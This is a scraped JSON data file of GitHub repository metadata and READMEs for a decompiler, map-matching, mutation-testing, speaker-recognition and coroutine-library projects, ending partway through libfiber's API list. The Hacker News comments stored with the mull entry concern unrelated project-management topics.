{"data": [{"name": "fay59/fcd", "link": "https://github.com/fay59/fcd", "tags": ["llvm", "x86-64", "elf", "mach-o", "clang", "decompiler"], "stars": 662, "description": "An optimizing decompiler", "lang": "C++", "repo_lang": "", "readme": "# fcd\n\n[![Travis build status][3]][7]\n\n**Fcd** is an LLVM-based native program optimizing decompiler, released under an LLVM-style license. It started as a bachelor's degree senior project and carries forward its initial development philosophy of getting results fast. As such, it was architectured to have low coupling between distinct decompilation phases and to be highly hackable.\n\nFcd uses a [unique technique][4] to reliably translate machine code to LLVM IR. Currently, it only supports x86_64. Disassembly uses [Capstone][2]. It implements [pattern-independent structuring][1] to provide a goto-free output.\n\nFcd allows you to [write custom optimization passes][6] to help solve odd jobs. It also [accepts header files][5] to discover function prototypes.\n\n [1]: http://www.internetsociety.org/doc/no-more-gotos-decompilation-using-pattern-independent-control-flow-structuring-and-semantics\n [2]: https://github.com/aquynh/capstone\n [3]: https://travis-ci.org/zneak/fcd.svg?branch=master\n [4]: http://zneak.github.io/fcd/2016/02/16/lifting-x86-code.html\n [5]: http://zneak.github.io/fcd/2016/09/04/parsing-headers.html\n [6]: http://zneak.github.io/fcd/2016/02/21/csaw-wyvern.html\n [7]: https://travis-ci.org/zneak/fcd\n", "readme_type": "markdown", "hn_comments": "Why this old, abandoned decompiler? Current is remill/anvill/McSema by Trail of Bits:https://github.com/lifting-bits/remillhttps://github.com/lifting-bits/anvillhttps://github.com/lifting-bits/mcsema", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cyang-kth/fmm", "link": "https://github.com/cyang-kth/fmm", "tags": ["map-matching", "road-network", "map-match", "fmm", "parrallel-map-matching", "match", "gps", "python", "shapefile", "openstreetmap", "trajectory", "stmatch", "gis"], "stars": 662, "description": "Fast map matching, an open source framework in C++", "lang": "C++", "repo_lang": "", "readme": "
\n \n
\n\n| Linux / macOS | Windows | Wiki | Docs |\n| ------------- | ------- | ------------- | ----------- |\n| [![Build Status](https://travis-ci.org/cyang-kth/fmm.svg?branch=master)](https://travis-ci.org/github/cyang-kth/fmm) | [![Build status](https://ci.appveyor.com/api/projects/status/8qee5c8iay75j1am?svg=true)](https://ci.appveyor.com/project/cyang-kth/fmm) | [![Wiki](https://img.shields.io/badge/wiki-website-blue.svg)](https://fmm-wiki.github.io/) | [![Documentation](https://img.shields.io/badge/docs-doxygen-blue.svg)](https://cyang-kth.github.io/fmm/) |\n\nFMM is an open source map matching framework in C++ and Python. It solves the problem of matching noisy GPS data to a road network. The design considers maximizing performance, scalability and functionality.\n\n### Online demo\n\nCheck the [online demo](https://fmm-demo.herokuapp.com/).\n\n### Features\n\n- **High performance**: C++ implementation using Rtree, optimized routing, parallel computing (OpenMP).\n- **Python API**: [jupyter-notebook](example/notebook) and [web app](example/web_demo)\n- **Scalibility**: millions of GPS points and millions of road edges. \n- **Multiple data format**:\n - Road network in OpenStreetMap or ESRI shapefile.\n - GPS data in Point CSV, Trajectory CSV and Trajectory Shapefile ([more details](https://fmm-wiki.github.io/docs/documentation/input/#gps-data)).\n- **Detailed matching information**: traversed path, geometry, individual matched edges, GPS error, etc. More information at [here](https://fmm-wiki.github.io/docs/documentation/output/).\n- **Multiple algorithms**: [FMM](http://www.tandfonline.com/doi/full/10.1080/13658816.2017.1400548) (for small and middle scale network) and [STMatch](https://dl.acm.org/doi/abs/10.1145/1653771.1653820) (for large scale road network)\n- **Platform support**: Unix (ubuntu) , Mac and Windows(cygwin environment).\n- **Hexagon match**: :tada: Match to the uber's [h3](https://github.com/uber/h3) Hexagonal Hierarchical Geospatial Indexing System. Check the [demo](example/h3).\n\nWe encourage contribution with feature request, bug report or developping new map matching algorithms using the framework.\n\n### Screenshots of notebook\n\nMap match to OSM road network by drawing\n\n![fmm_draw](https://github.com/cyang-kth/fmm-examples/blob/master/img/fmm_draw.gif?raw=true)\n\nExplore the factor of candidate size k, search radius and GPS error\n\n![fmm_explore](https://github.com/cyang-kth/fmm-examples/blob/master/img/fmm_explore.gif?raw=true)\n\nExplore detailed map matching information\n\n![fmm_detail](https://github.com/cyang-kth/fmm-examples/blob/master/img/fmm_detail.gif?raw=true)\n\nExplore with dual map\n\n![dual_map](https://github.com/cyang-kth/fmm-examples/blob/master/img/dual_map.gif?raw=true)\n\nMap match to hexagon by drawing\n\n![hex_draw](https://github.com/cyang-kth/fmm-examples/blob/master/img/hex_draw.gif?raw=true)\n\nExplore the factor of hexagon level and interpolate\n\n![hex_explore](https://github.com/cyang-kth/fmm-examples/blob/master/img/hex_explore.gif?raw=true)\n\nSource code of these screenshots are available at https://github.com/cyang-kth/fmm-examples.\n\n### Installation, example, tutorial and API.\n\n- Check [https://fmm-wiki.github.io/](https://fmm-wiki.github.io/) for installation, documentation.\n- Check [example](example) for simple examples of fmm.\n- :tada: Check [https://github.com/cyang-kth/fmm-examples](https://github.com/cyang-kth/fmm-examples)\nfor interactive map matching in notebook.\n\n### Code docs for developer\n\nCheck [https://cyang-kth.github.io/fmm/](https://cyang-kth.github.io/fmm/)\n\n### Contact and citation\n\nCan Yang, Ph.D. student at KTH, Royal Institute of Technology in Sweden\n\nEmail: cyang(at)kth.se\n\nHomepage: https://people.kth.se/~cyang/\n\nFMM originates from an implementation of this paper [Fast map matching, an algorithm integrating hidden Markov model with precomputation](http://www.tandfonline.com/doi/full/10.1080/13658816.2017.1400548). A post-print version of the paper can be downloaded at [link](https://people.kth.se/~cyang/bib/fmm.pdf). Substaintial new features have been added compared with the original paper. \n\nPlease cite fmm in your publications if it helps your research:\n\n Can Yang & Gyozo Gidofalvi (2018) Fast map matching, an algorithm\n integrating hidden Markov model with precomputation, International Journal of Geographical Information Science, 32:3, 547-570, DOI: 10.1080/13658816.2017.1400548\n\nBibtex file\n\n```bibtex\n@article{Yang2018FastMM,\n title={Fast map matching, an algorithm integrating hidden Markov model with precomputation},\n author={Can Yang and Gyozo Gidofalvi},\n journal={International Journal of Geographical Information Science},\n year={2018},\n volume={32},\n number={3},\n pages={547 - 570}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mull-project/mull", "link": "https://github.com/mull-project/mull", "tags": ["mutation-testing", "llvm", "c", "c-plus-plus", "mutation-analysis", "jit", "fault-injection", "testing"], "stars": 662, "description": "Practical mutation testing and fault injection for C and C++", "lang": "C++", "repo_lang": "", "readme": "# Mull\n\nMull is a practical [mutation testing](https://mull.readthedocs.io/en/latest/MutationTestingIntro.html) tool for C and C++.\n\nFor installation and usage please refer to the latest documentation: https://mull.readthedocs.io\n\nFor support visit [this page](https://mull.readthedocs.io/en/latest/Support.html).\n\n## Join us in Discord\n\nHere is the invitation link to the Discord channel: https://discord.gg/Hphp7dW\n\n## Contributing\n\nHere is the starting point: [CONTRIBUTING.md](CONTRIBUTING.md)\n\n## Citation\n\n[Mull it over: mutation testing based on LLVM (preprint)](https://lowlevelbits.org/pdfs/Mull_Mutation_2018.pdf)\n\n```\n@INPROCEEDINGS{8411727, \nauthor={A. Denisov and S. Pankevich}, \nbooktitle={2018 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW)}, \ntitle={Mull It Over: Mutation Testing Based on LLVM}, \nyear={2018}, \nvolume={}, \nnumber={}, \npages={25-31}, \nkeywords={just-in-time;program compilers;program testing;program verification;mutations;Mull;LLVM IR;mutated programs;compiled programming languages;LLVM framework;LLVM JIT;tested program;mutation testing tool;Testing;Tools;Computer languages;Instruments;Runtime;Computer crashes;Open source software;mutation testing;llvm}, \ndoi={10.1109/ICSTW.2018.00024}, \nISSN={}, \nmonth={April},}\n```\n\n## Packages\n\n[![Hosted By: Cloudsmith](https://img.shields.io/badge/OSS%20hosting%20by-cloudsmith-blue?logo=cloudsmith&style=for-the-badge)](https://cloudsmith.com)\n\nHosting for precompiled packages is graciously provided by [Cloudsmith](https://cloudsmith.com).\n\n## Copyright\n\nCopyright (c) 2016-2022 Alex Denisov and Stanislav Pankevich . See LICENSE for details.\n", "readme_type": "markdown", "hn_comments": "Story of my life. At the moment I have 10+ projects (due the nature of my role). I make it work with a pen and a pad of paper.Every couple of days I go through and clean everything up, it helps to keep everything top of mind. So in that way the lack of ergonomics is a feature, not a bug.Try codecks.io which I found because one of the devs posted here. It's like Trello on steroids (imports Trello boards, too). We switched our complex product development to Codecks almost immediately and are lovin' it.Is it the same projects/ code for all clients? If so do they get the same built product? 1 backlog.Different code for different clients? Many backlogs.Projects share code base maybe?Then you need Prioritization, planning and if you don't have that as a prerequisite then do Kanban maybe.It sounds like you cannot split the team and depending you could just have 1 product owner or a proxy PO.If clients need to approve designs that's design and backlog grooming- once the story is ready move it into a ready state (tag or state attribute)If you're reactive then kanban works better than sprints but of course depends on your environment, product/project mix, support vs product dev, and team compositionI've worked at an agency that went fully into Agile and Scrum.When it worked well, we had a single sprint board with different product backlogs, with different PO's for each product (where possible). All dev work would go onto a single sprint board, and we'd all attack the highest priority story (where possible) until the dev work was complete. UX/UI were introduced into the team, and when it worked best they worked with the frontend developers to create designs and prototypes to be signed off, and this went through typical backlog grooming until it was ready to go fully into the sprint.In my experience, Scrum only works in an agency environment when \"the process\" is strict. All ceremonies/meetings run for the amount of time required, all clients are aware of the process and have a product owner on hand to speak to, standups are kept short and purely as a technical update, rather than a reporting meeting, and sprints are worked out properly and never overloaded, with sprint points being adjusted based on velocity.When we stuck to this process, everything worked brilliantly, and the way we worked felt more robust. Instead of everything coming across the line in one go, we were testing and releasing individual stories on time, and when things inevitably changed we adjusted where needed or told the client to wait until the next sprint.Of course, over time our management took liberties. Standups were attended by account managers (who decided they were no longer product owners) and turned into 30 mins+ reporting meetings, sprint retros and reviews stopped, and sprint planning was reduced to an hour. Additionally, we were asked to deliver part-way through a sprint and to deliver to UAT with no testing. The difference in delivery was night and day. We went from a team that could deliver quickly with ample testing time and enough of a break between sprints to not feel stressed, to a team of cowboys that deliver buggy code.why all the configurations is it access to screens or resources? like role based security?or personalization?different functionality that should maybe be a different app?Environmental. pointing to different resources in test versus prod?From my perspective it's the threshold effect: in every endeavor there is a threshold which is hard to reach, but it gets easier for one to replicate similar things after passing it.It is hard to find an important problem and create a viable mass market solution for it. By accomplishing this once, you get important skills such as time and project management, marketing and engineering skills etc. Acquiring those skills are hard work, but once you master them, you can apply those to everything you do. So naturally it gets easier to create new solutions.There might be a network effect too. Creating a great project might enlarge your network with other people who are creating important solutions. I think this would set you in an interesting position; people would come to you with their most important problems they wanted to see solved since you have a proven track record. Ideas breed ideas. This might help with finding another important problem worth solving.The most common thing about those creating great things time after time, is their production/consumption ratio. Humans tend to lean on consumption side and since the world is full of distraction we are wasting most of our valuable time on consuming info-junk. The over achievers I had a chance to meet were always skewed towards the production side. They almost always learned new things with a purpose. Also the threshold effect might be the cause of this high production/consumption ratio. Creating one great project might have created an emotional and hormonal concoction, a high, that motivates people to focus on creating things.Accomplishing one great task, those people has the confidence and swag that they can achieve another one. People around them would cheer them up instead of hindering their motivation by reminding them how hard that task is. They would not remind them that they might be wasting their time by tackling that huge problem. They would find eager help and funding when they need.Those are the first few things that came to my mind when I think about what factors might create multi-project programmers.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ppwwyyxx/speaker-recognition", "link": "https://github.com/ppwwyyxx/speaker-recognition", "tags": [], "stars": 662, "description": "A Speaker Recognition System ", "lang": "C++", "repo_lang": "", "readme": "## About\n\nThis is a [Speaker Recognition](https://en.wikipedia.org/wiki/Speaker_recognition) system with GUI.\n\nFor more details of this project, please see:\n\n+ Our [presentation slides](https://github.com/ppwwyyxx/speaker-recognition/raw/master/doc/Presentation.pdf)\n+ Our [complete report](https://github.com/ppwwyyxx/speaker-recognition/raw/master/doc/Final-Report-Complete.pdf)\n\n## Dependencies\n\nThe [Dockerfile](Dockerfile) can be used to get started with the project easier.\n\n+ Linux, Python 2\n+ [scikit-learn](http://scikit-learn.org/),\n [scikits.talkbox](http://scikits.appspot.com/talkbox), \n [pyssp](https://pypi.python.org/pypi/pyssp), \n [PyAudio](http://people.csail.mit.edu/hubert/pyaudio/):\n ```\n pip install --user scikit-learn scikits.talkbox pyssp PyAudio\n ```\n+ [PyQt4](http://sourceforge.net/projects/pyqt/), usually can be installed by\n your package manager.\n+ (Optional)Python bindings for [bob](http://idiap.github.io/bob/):\n\t+ install blitz, openblas, boost, then:\n\t```\n\tfor p in bob.extension bob.blitz bob.core bob.sp bob.ap; do\n\t\tpip install --user $p\n\tdone\n\t```\n\nNote: We have a MFCC implementation on our own\nwhich will be used as a fallback when bob is unavailable.\nBut it's not so efficient as the C implementation in bob.\n\n## Algorithms Used\n\n_Voice Activity Detection_(VAD):\n+ [Long-Term Spectral Divergence](http://www.sciencedirect.com/science/article/pii/S0167639303001201) (LTSD)\n\n_Feature_:\n+ [Mel-Frequency Cepstral Coefficient](http://en.wikipedia.org/wiki/Mel-frequency_cepstrum) (MFCC)\n+ [Linear Predictive Coding](http://en.wikipedia.org/wiki/Linear_predictive_coding) (LPC)\n\n_Model_:\n+ [Gaussian Mixture Model](http://en.wikipedia.org/wiki/Mixture_model#Gaussian_mixture_model) (GMM)\n+ [Universal Background Model](http://www.sciencedirect.com/science/article/pii/S1051200499903615) (UBM)\n+ Continuous [Restricted Boltzman Machine](https://en.wikipedia.org/wiki/Restricted_Boltzmann_machine) (CRBM)\n+ [Joint Factor Analysis](http://speech.fit.vutbr.cz/software/joint-factor-analysis-matlab-demo) (JFA)\n\n## GUI Demo\n\nOur GUI has basic functionality for recording, enrollment, training and testing, plus a visualization of real-time speaker recognition:\n\n![graph](https://github.com/ppwwyyxx/speaker-recognition/raw/master/doc/Final-Report-Complete/img/gui-graph.png)\n\nYou can See our [demo video](https://github.com/ppwwyyxx/speaker-recognition/raw/master/demo.avi) (in Chinese).\nNote that real-time speaker recognition is extremely hard, because we only use corpus of about 1 second length to identify the speaker.\nTherefore the system doesn't work very perfect.\n\nThe GUI part is quite hacky for demo purpose and is not maintained anymore today.\nTake it as a reference, but don't expect it to work out of the box. Use command line tools to try the algorithms instead.\n\n## Command Line Tools\n```sh\nusage: speaker-recognition.py [-h] -t TASK -i INPUT -m MODEL\n\nSpeaker Recognition Command Line Tool\n\noptional arguments:\n -h, --help show this help message and exit\n -t TASK, --task TASK Task to do. Either \"enroll\" or \"predict\"\n -i INPUT, --input INPUT\n Input Files(to predict) or Directories(to enroll)\n -m MODEL, --model MODEL\n Model file to save(in enroll) or use(in predict)\n\nWav files in each input directory will be labeled as the basename of the directory.\nNote that wildcard inputs should be *quoted*, and they will be sent to glob module.\n\nExamples:\n Train:\n ./speaker-recognition.py -t enroll -i \"./bob/ ./mary/ ./person*\" -m model.out\n\n Predict:\n ./speaker-recognition.py -t predict -i \"./*.wav\" -m model.out\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "iqiyi/libfiber", "link": "https://github.com/iqiyi/libfiber", "tags": ["coroutines", "epoll", "kqueue", "iocp", "select", "poll", "gui-coroutine", "coroutine", "fiber"], "stars": 661, "description": "The high performance coroutine library for Linux/FreeBSD/MacOS/Windows, supporting select/poll/epoll/kqueue/iocp/windows GUI", "lang": "C++", "repo_lang": "", "readme": "# \u9ad8\u6027\u80fd\u7f51\u7edc\u534f\u7a0b\u5e93\uff0c\u652f\u6301 Linux/BSD/Mac/Windows\n\n## \u6982\u8ff0\n\u672c\u534f\u7a0b\u5e93\u6765\u81ea\u4e8e [acl \u5de5\u7a0b](#https://github.com/acl-dev/acl) \u534f\u7a0b\u6a21\u5757\u3002\u76ee\u524d\u652f\u6301\u7684\u64cd\u4f5c\u7cfb\u7edf\u6709\uff1aLinux\uff0cFreeBSD\uff0cMacOS \u548c Windows\uff0c\u652f\u6301\u7684\u4e8b\u4ef6\u7c7b\u578b\u6709\uff1aselect\uff0cpoll\uff0cepoll\uff0ckqueue\uff0ciocp \u53ca Windows GUI \u7a97\u53e3\u6d88\u606f\u3002\u901a\u8fc7 libfiber \u7f51\u7edc\u534f\u7a0b\u5e93\uff0c\u7528\u6237\u53ef\u4ee5\u975e\u5e38\u5bb9\u6613\u5730\u5199\u51fa\u9ad8\u6027\u80fd\u3001\u9ad8\u53ef\u9760\u7684\u7f51\u7edc\u901a\u4fe1\u670d\u52a1\u3002\u56e0\u4e3a\u4f7f\u7528\u4e86\u540c\u6b65\u987a\u5e8f\u7f16\u7a0b\u7684\u601d\u7ef4\u65b9\u5f0f\uff0c\u76f8\u5bf9\u4e8e\u5f02\u6b65\u6a21\u5f0f\uff08\u65e0\u8bba\u662f reactor \u6a21\u578b\u8fd8\u662f proactor \u6a21\u578b\uff09\uff0c\u7f16\u5199\u7f51\u7edc\u5e94\u7528\u66f4\u52a0\u7b80\u5355\u3002 \nlibfiber \u4e0d\u4ec5\u652f\u6301\u5e38\u89c1\u7684 IO \u4e8b\u4ef6\u5f15\u64ce\uff0c\u800c\u4e14\u652f\u6301 Win32 GUI \u754c\u9762\u6d88\u606f\u5f15\u64ce\uff0c\u8fd9\u6837\u5f53\u4f60\u4f7f\u7528 MFC\uff0cwtl \u6216\u5176\u5b83 GUI \u754c\u9762\u5e93\u7f16\u5199\u754c\u9762\u7f51\u7edc\u5e94\u7528\u65f6\uff0c\u4e5f\u4f1a\u53d8\u5f97\u5f02\u5e38\u7b80\u5355\uff0c\u8fd9\u7684\u786e\u662f\u4ef6\u4ee4\u4eba\u5174\u594b\u7684\u4e8b\u3002\n\n## \u652f\u6301\u7684\u4e8b\u4ef6\u5f15\u64ce\u6709\u54ea\u4e9b\uff1f\n\u4ee5\u4e0b\u4e3a libfiber \u6240\u652f\u6301\u7684\u4e8b\u4ef6\u5f15\u64ce\uff1a\n\nEvent|Linux|BSD|Mac|Windows\n-----|----|------|---|---\nselect|yes|yes|yes|yes\npoll|yes|yes|yes|yes\nepoll|yes|no|no|no\nkqueue|no|yes|yes|no\niocp|no|no|no|yes\nWin GUI message|no|no|no|yes\n\n## \u793a\u4f8b\n\n### \u57fa\u4e8e\u534f\u7a0b\u7684\u7f51\u7edc\u670d\u52a1\u5668\n\n```C\n// fiber_server.c\n\n#include \n#include \n#include \n#include \"fiber/lib_fiber.h\"\n#include \"patch.h\" // in the samples path\n\nstatic size_t __stack_size = 128000;\nstatic const char *__listen_ip = \"127.0.0.1\";\nstatic int __listen_port = 9001;\n\nstatic void fiber_client(ACL_FIBER *fb, void *ctx)\n{\n\tSOCKET *pfd = (SOCKET *) ctx;\n\tchar buf[8192];\n\n\twhile (1) {\n#if defined(_WIN32) || defined(_WIN64)\n\t\tint ret = acl_fiber_recv(*pfd, buf, sizeof(buf), 0);\n#else\n\t\tint ret = recv(*pfd, buf, sizeof(buf), 0);\n#endif\n\t\tif (ret == 0) {\n\t\t\tbreak;\n\t\t} else if (ret < 0) {\n\t\t\tif (acl_fiber_last_error() == FIBER_EINTR) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n#if defined(_WIN32) || defined(_WIN64)\n\t\tif (acl_fiber_send(*pfd, buf, ret, 0) < 0) {\n#else\n\t\tif (send(*pfd, buf, ret, 0) < 0) {\n#endif\t\t\t\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tsocket_close(*pfd);\n\tfree(pfd);\n}\n\nstatic void fiber_accept(ACL_FIBER *fb, void *ctx)\n{\n\tconst char *addr = (const char *) ctx;\n\tSOCKET lfd = socket_listen(__listen_ip, __listen_port);\n\n\tassert(lfd >= 0);\n\n\tfor (;;) {\n\t\tSOCKET *pfd, cfd = socket_accept(lfd);\n\t\tif (cfd == INVALID_SOCKET) {\n\t\t\tprintf(\"accept error %s\\r\\n\", acl_fiber_last_serror());\n\t\t\tbreak;\n\t\t}\n\t\tpfd = (SOCKET *) malloc(sizeof(SOCKET));\n\t\t*pfd = cfd;\n\n\t\t// create and start one fiber to handle the client socket IO\n\t\tacl_fiber_create(fiber_client, pfd, __stack_size);\n\t}\n\n\tsocket_close(lfd);\n\texit (0);\n}\n\n// FIBER_EVENT_KERNEL represents the event type on\n// Linux(epoll), BSD(kqueue), Mac(kqueue), Windows(iocp)\n// FIBER_EVENT_POLL: poll on Linux/BSD/Mac/Windows\n// FIBER_EVENT_SELECT: select on Linux/BSD/Mac/Windows\n// FIBER_EVENT_WMSG: Win GUI message on Windows\n// acl_fiber_create/acl_fiber_schedule_with are in `lib_fiber.h`.\n// socket_listen/socket_accept/socket_close are in patch.c of the samples path.\n\nint main(void)\n{\n\tint event_mode = FIBER_EVENT_KERNEL;\n\n#if defined(_WIN32) || defined(_WIN64)\n\tsocket_init();\n#endif\n\n\t// create one fiber to accept connections\n\tacl_fiber_create(fiber_accept, NULL, __stack_size);\n\n\t// start the fiber schedule process\n\tacl_fiber_schedule_with(event_mode);\n\n#if defined(_WIN32) || defined(_WIN64)\n\tsocket_end();\n#endif\n\n\treturn 0;\n}\n```\n\n### \u57fa\u4e8e\u534f\u7a0b\u7684\u5ba2\u6237\u7aef\u7a0b\u5e8f\n\n```C\n// fiber_client.c\n\n#include \n#include \n#include \n#include \n#include \"fiber/lib_fiber.h\"\n#include \"patch.h\" // in the samples path\n\nstatic const char *__server_ip = \"127.0.0.1\";\nstatic int __server_port = 9001;\n\n// socket_init/socket_end/socket_connect/socket_close are in patch.c of the samples path\n\nstatic void fiber_client(ACL_FIBER *fb, void *ctx)\n{\n\tSOCKET cfd = socket_connect(__server_ip, __server_port);\n\tconst char *s = \"hello world\\r\\n\";\n\tchar buf[8192];\n\tint i, ret;\n\n\tif (cfd == INVALID_SOCKET) {\n\t\treturn;\n\t}\n\n\tfor (i = 0; i < 1024; i++) {\n#if defined(_WIN32) || defined(_WIN64)\n\t\tif (acl_fiber_send(cfd, s, strlen(s), 0) <= 0) {\n#else\n\t\tif (send(cfd, s, strlen(s), 0) <= 0) {\n#endif\t\t\t\n\t\t\tprintf(\"send error %s\\r\\n\", acl_fiber_last_serror());\n\t\t\tbreak;\n\t\t}\n\n#if defined(_WIN32) || defined(_WIN64)\n\t\tret = acl_fiber_recv(cfd, buf, sizeof(buf), 0);\n#else\n\t\tret = recv(cfd, buf, sizeof(buf), 0);\n#endif\t\t\n\t\tif (ret <= 0) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n#if defined(_WIN32) || defined(_WIN64)\n\tacl_fiber_close(cfd);\n#else\n\tclose(cfd);\n#endif\n}\n\nint main(void)\n{\n\tint event_mode = FIBER_EVENT_KERNEL;\n\tsize_t stack_size = 128000;\n\n\tint i;\n\n#if defined(_WIN32) || defined(_WIN64)\n\tsocket_init();\n#endif\n\n\tfor (i = 0; i < 100; i++) {\n\t\tacl_fiber_create(fiber_client, NULL, stack_size);\n\t}\n\n\tacl_fiber_schedule_with(event_mode);\n\n#if defined(_WIN32) || defined(_WIN64)\n\tsocket_end();\n#endif\n\n\treturn 0;\n}\n```\n\n### \u57fa\u4e8e\u534f\u7a0b\u7684 Windows \u754c\u9762\u7f51\u7edc\u7a0b\u5e8f\n\u5728[\u793a\u4f8b\u76ee\u5f55](samples/WinEchod) \u4e0b\u4e3a\u57fa\u4e8e\u534f\u7a0b\u7684 Windows \u754c\u9762\u7f51\u7edc\u7a0b\u5e8f\uff0c\u7a0b\u5e8f\u8fd0\u884c\u622a\u5c4f\u5982![\u56fe](res/winecho.png)\n\n\u8be5 Windows \u754c\u9762\u7a0b\u5e8f\u5305\u542b`\u7f51\u7edc\u670d\u52a1\u5668`\u548c`\u7f51\u7edc\u5ba2\u6237\u7aef`\u4e24\u4e2a\u529f\u80fd\u3002\u5728\u8fd0\u884c\u65f6\uff0c\u670d\u52a1\u6a21\u5757\u548c\u5ba2\u6237\u7aef\u6a21\u5757\u8fd0\u884c\u5728 Windows \u754c\u9762\u7ebf\u7a0b\u4e2d\uff0c\u56e0\u4e3a\u534f\u7a0b\u5e93\u4f7f\u7528\u4e86 Windows \u754c\u9762\u6d88\u606f\u6cf5\uff0c\u6240\u4ee5\u534f\u7a0b\u6a21\u5757\u53ef\u4ee5\u4e0e\u754c\u9762\u4e0a\u5143\u7d20\u6210\u4e3a`\u4e00\u4f53`\u800c\u4e0d\u5fc5\u8de8\u8d8a\u7ebf\u7a0b\uff0c\u4e5f\u4e0d\u5fc5\u4f7f\u7528\u4ee4\u4eba\u70e6\u607c\u7684\u5f02\u6b65\u5957\u63a5\u5b57 API\u3002\n\n### \u66f4\u591a\u4f8b\u5b50\n\u5728 [\u793a\u4f8b](samples/) \u4e2d\u6709\u4e00\u4e9b\u4f8b\u5b50\u63cf\u8ff0\u4e86\u5982\u4f55\u4f7f\u7528 libfiber \u5e93\u63d0\u4f9b\u7684 API \u8fdb\u884c\u7f51\u7edc\u7f16\u7a0b\uff1b\u53e6\u5916\uff0c\u5728 [acl\u5de5\u7a0b\u4e2d](https://github.com/acl-dev/acl/tree/master/lib_fiber/samples)\uff0c\u6709\u66f4\u591a\u7684\u793a\u4f8b\u6765\u63cf\u8ff0\u7f51\u7edc\u534f\u7a0b\u7f16\u7a0b\uff0c\u5f53\u7136\uff0c\u8fd9\u4e9b\u4f8b\u5b50\u8fd8\u5927\u91cf\u4f7f\u7528\u4e86 [acl \u5e93](https://github.com/acl-dev/acl/)\u4e2d\u7684\u5176\u5b83\u5e93\u7684 API\u3002\n\n## \u7f16\u7a0b libfiber \u672c\u534f\u7a0b\u5e93\n### \u5728 Unix \u5e73\u53f0\u7f16\u8bd1\n\n```\n$cd libfiber\n$make\n$cd samples\n$make\n```\n\n\u4e0b\u9762\u7ed9\u51fa\u4e86\u4e00\u4e2a\u4f8b\u5b50\u7684 Makefile \u5185\u5bb9\uff1a\n\n```\nfiber_server: fiber_server.c\n\tgcc -o fiber_server fiber_server.c patch.c -I{path_of_fiber_header} -L{path_of_fiber_lib) -lfiber -ldl -lpthread\n\nfiber_client: fiber_client.c\n\tgcc -o fiber_client fiber_client.c patch.c -I{path_of_fiber_header} -L{path_of_fiber_lib) -lfiber -ldl -lpthread\n```\n\n### \u5728 Windows \u5e73\u53f0\u7f16\u8bd1\n\u76ee\u524d\u53ef\u4ee5\u4f7f\u7528 vc2012/vc2013/vc2015 \u5206\u522b\u6253\u5f00 [fiber_vc2012.sln](c/fiber_vc2012.sln) /[fiber_vc2013.sln](c/fiber_vc2013.sln)/[fiber_vc2015.sln](c/fiber_vc2015.sln) \u7f16\u8bd1 libfiber \u5e93\u3002\n\n## \u6027\u80fd\u6d4b\u8bd5\n\u4e0b\u9762\u4ec5\u505a\u4e86\u7b80\u5355\u7684 IOPS \uff08\u7f51\u7edc IO \u6027\u80fd\uff09\u7684\u6d4b\u8bd5\uff0c\u540c\u65f6\u548c\u5176\u5b83\u534f\u7a0b\u5e93\u505a\u4e86\u7b80\u5355\u7684\u5bf9\u6bd4\uff1a \n![Benchmark](res/benchmark.png) \n\u5176\u5b83\u7684\u7f51\u7edc\u534f\u7a0b\u5e93\u6709\uff1a[libmill](https://github.com/sustrik/libmill)\uff0cgolang \u548c [libco](https://github.com/Tencent/libco)\u3002\u5176\u4e2d\uff0c\u5404\u4e2a\u5e93\u7684\u538b\u6d4b\u793a\u4f8b\uff1a\n1. \u57fa\u4e8e libmill \u548c libco \u7684\u538b\u6d4b\u7528\u4f8b\u5728 [\u76ee\u5f55](benchmark) \u4e0b;\n2. \u57fa\u4e8e Golang \u7684\u538b\u6d4b\u7528\u4f8b\u5728 [\u76ee\u5f55](https://github.com/acl-dev/master-go/tree/master/examples/echo)\u4e2d;\n3. \u57fa\u4e8e libfiber \u7684\u538b\u6d4b\u7528\u4f8b\uff1a[\u793a\u4f8b](samples/server);\n4. \u5ba2\u6237\u7aef\u538b\u6d4b\u7a0b\u5e8f\uff1ahttps://github.com/acl-dev/acl/tree/master/lib_fiber/samples/client2\n\n## API \u5217\u8868 \n\n### Base API \n- acl_fiber_create \n- acl_fiber_self \n- acl_fiber_status \n- acl_fiber_kill \n- acl_fiber_killed \n- acl_fiber_signal \n- acl_fiber_yield \n- acl_fiber_ready \n- acl_fiber_switch \n- acl_fiber_schedule_init \n- acl_fiber_schedule \n- acl_fiber_schedule_with \n- acl_fiber_scheduled \n- acl_fiber_schedule_stop \n- acl_fiber_set_specific \n- acl_fiber_get_specific \n- acl_fiber_delay \n- acl_fiber_last_error \n- acl_fiber_last_serror \n\n### IO API\n- acl_fiber_recv \n- acl_fiber_recvfrom \n- acl_fiber_read \n- acl_fiber_readv \n- acl_fiber_recvmsg \n- acl_fiber_write \n- acl_fiber_writev \n- acl_fiber_send \n- acl_fiber_sendto \n- acl_fiber_sendmsg \n- acl_fiber_select \n- acl_fiber_poll \n- acl_fiber_close \n\n### Net API\n- acl_fiber_socket \n- acl_fiber_listen \n- acl_fiber_accept \n- acl_fiber_connect \n- acl_fiber_gethostbyname_r\n- acl_fiber_getaddrinfo\n- acl_fiber_freeaddrinfo\n\n### Channel API \n- acl_channel_create \n- acl_channel_free \n- acl_channel_send \n- acl_channel_send_nb \n- acl_channel_recv \n- acl_channel_recv_nb \n- acl_channel_sendp \n- acl_channel_recvp \n- acl_channel_sendp_nb \n- acl_channel_recvp_nb \n- acl_channel_sendul \n- acl_channel_recvul \n- acl_channel_sendul_nb \n- acl_channel_recvul_nb \n\n### Sync API\nACL_FIBER_MUTEX \n- acl_fiber_mutex_create \n- acl_fiber_mutex_free \n- acl_fiber_mutex_lock \n- acl_fiber_mutex_trylock \n- acl_fiber_mutex_unlock \n\nACL_FIBER_RWLOCK \n- acl_fiber_rwlock_create \n- acl_fiber_rwlock_free \n- acl_fiber_rwlock_rlock \n- acl_fiber_rwlock_tryrlock \n- acl_fiber_rwlock_wlock \n- acl_fiber_rwlock_trywlock \n- 